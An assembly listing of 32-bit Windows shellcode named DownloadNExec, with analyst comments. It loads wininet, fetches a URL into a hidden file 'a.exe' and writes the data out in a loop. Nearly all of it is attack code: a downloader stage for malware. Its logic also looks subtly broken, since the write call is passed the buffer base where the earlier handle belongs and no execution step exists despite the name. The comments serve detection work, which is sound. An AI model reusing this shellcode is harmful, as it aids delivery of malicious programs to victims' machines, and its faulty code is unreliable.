;DownloadNExec.asm 
;nasm -f elf DownloadNExec.asm
;ld -o DownloadNExec DownloadNExec.o
;objdump -d DownloadNExec
;
; Syntax: NASM (Intel operand order), 32-bit x86, position-independent byte
; sequence. The API targets are Win32 calls reached through hard-coded
; absolute addresses, while the build line above produces an ELF object
; (presumably only so objdump can list the opcode bytes - confirm).
;
; What the listing does, in order:
;   1. loads the 'wininet' library through LoadLibraryA,
;   2. opens an internet session and a URL (labels InternetOpen / InternetOpenUrl),
;   3. creates a local file named 'a.exe' (label CreateFile),
;   4. loops reading chunks of up to 0x104 bytes into a stack buffer and
;      passing them to a write call,
;   5. makes one more call, releases the stack buffer and spins forever.
; Despite the file name, no process-creation call appears in this listing.
;
; Notes for analysts and detection engineers:
;   - Every API is called through a literal address (0x7583xxxx, 0x7570xxxx,
;     0x756fxxxx). Such addresses are valid only for one specific module
;     layout; with ASLR the modules are rebased and the constants go stale.
;   - Only the first address is named by the original author (LoadLibraryA).
;     The API names given for the other addresses are inferred from the
;     labels and argument counts and are marked as such below.
;   - Observable behaviour of this pattern: wininet being loaded by a process
;     that does not normally use it, an outbound HTTP request from that
;     process, and a file with an .exe name created in its working directory.
;   - The URL in the listing is a generic placeholder, not an indicator.

[BITS 32]

LoadWininet:
    ; call pushes the address of the string that follows it; with no pop
    ; before the next call, that address stays on the stack as its argument.
    Call GetLibHandle
    db 'wininet',0
GetLibHandle:
    mov ebx,0x75832884          ; ebx = &LoadLibraryA
    call ebx                    ; call LoadLibraryA
InternetOpen:
    ; Five zero dwords are pushed as arguments, then the routine at
    ; 0x75707ddc is called (presumably InternetOpenA - confirm against the
    ; module the address belongs to). Its result is left in eax.
    xor eax,eax
    push eax
    push eax
    push eax
    push eax
    push eax
    mov ebx,0x75707ddc
    call ebx
InitUrlString:
    ; call/pop pair: the pushed return address is the address of the URL string.
    call InternetOpenUrl
    db 'http://www.google.com',0
InternetOpenUrl:
    pop ebx                     ; ebx = address of the URL string
    xor ecx,ecx
    push ecx                    ; args 6..3 = 0
    push ecx
    push ecx
    push ecx
    push ebx                    ; arg 2 = URL string
    push eax                    ; arg 1 = value returned by the previous call
    mov ebx,0x7570dbd8          ; presumably InternetOpenUrlA - confirm
    call ebx
InitFileStr:
    ; Same call/pop pattern, this time for the output file name.
    call CreateFile
    db 'a.exe',0
CreateFile:
    ; Seven arguments are pushed last-to-first. If 0x7583291c is CreateFileA
    ; (inferred from the label - confirm), they read as:
    ;   name='a.exe', access=0x40000000 (GENERIC_WRITE), share=0, security=0,
    ;   disposition=2 (CREATE_ALWAYS), attributes=0x82 (NORMAL|HIDDEN), template=0
    pop ebx                     ; ebx = address of 'a.exe'
    xor eax,eax
    push eax                    ; arg 7 = 0
    mov al,0x82
    push eax                    ; arg 6 = 0x82
    mov al,0x02
    push eax                    ; arg 5 = 2
    xor al,al
    push eax                    ; arg 4 = 0
    push eax                    ; arg 3 = 0
    mov al,0x40
    sal eax,0x18                ; eax = 0x40 << 24 = 0x40000000
    push eax                    ; arg 2 = 0x40000000
    push ebx                    ; arg 1 = file name
    mov ebx,0x7583291c
    call ebx
    mov edi,eax                 ; edi = value returned by the call above
download_begin:
    ; Reserve 0x010c (268) bytes of stack as scratch space, based at esi:
    ;   [esi+0x04]  dword written by the read call and tested below
    ;   [esi+0x08]  start of the data buffer (0x104 bytes are requested per read)
    xor eax,eax
    mov ax,0x010c
    sub esp,eax
    mov esi,esp
download_loop:
    ; Four arguments for the routine at 0x756fe264 (presumably
    ; InternetReadFile, given the argument shape - confirm).
    lea ebx, [esi+0x04]
    push ebx                    ; arg 4 = address of the dword at [esi+0x04]
    mov ax,0x0104               ; low word of eax = 0x0104 (260)
    push eax                    ; arg 3 = requested size
    lea eax, [esi+0x08]
    push eax                    ; arg 2 = data buffer
    push edi                    ; arg 1 = edi, set after the call at 0x7583291c
    mov ecx,0x756fe264
    call ecx
    mov eax,[esi+0x04]          ; eax = dword at [esi+0x04]
    test eax,eax
    jz download_finished        ; zero -> leave the loop
download_write_file:
    ; Five arguments for the routine at 0x758311ec (presumably WriteFile - confirm).
    xor eax,eax
    push eax                    ; arg 5 = 0
    lea eax,[esi+0x04]
    push eax                    ; arg 4 = address of the dword at [esi+0x04]
    push dword [esi+0x04]       ; arg 3 = value of that dword
    lea eax,[esi+0x08]
    push eax                    ; arg 2 = data buffer
    push esi                    ; arg 1 = esi, the base of the scratch area
    mov ecx,0x758311ec
    call ecx
    jmp download_loop
download_finished:
    ; One argument, read from [ebp+0x3c], for the routine at 0x758305d7
    ; (API not identifiable from this listing). ebp is never written
    ; anywhere in this listing, so the value pushed depends on the host context.
    push dword [ebp + 0x3c]
    mov ecx,0x758305d7
    call ecx
    xor eax, eax
    mov ax, 0x010c
    add esp, eax                ; release the 0x010c-byte scratch area
EndShellCode:
    jmp EndShellCode            ; spin in place; nothing is executed or returned to
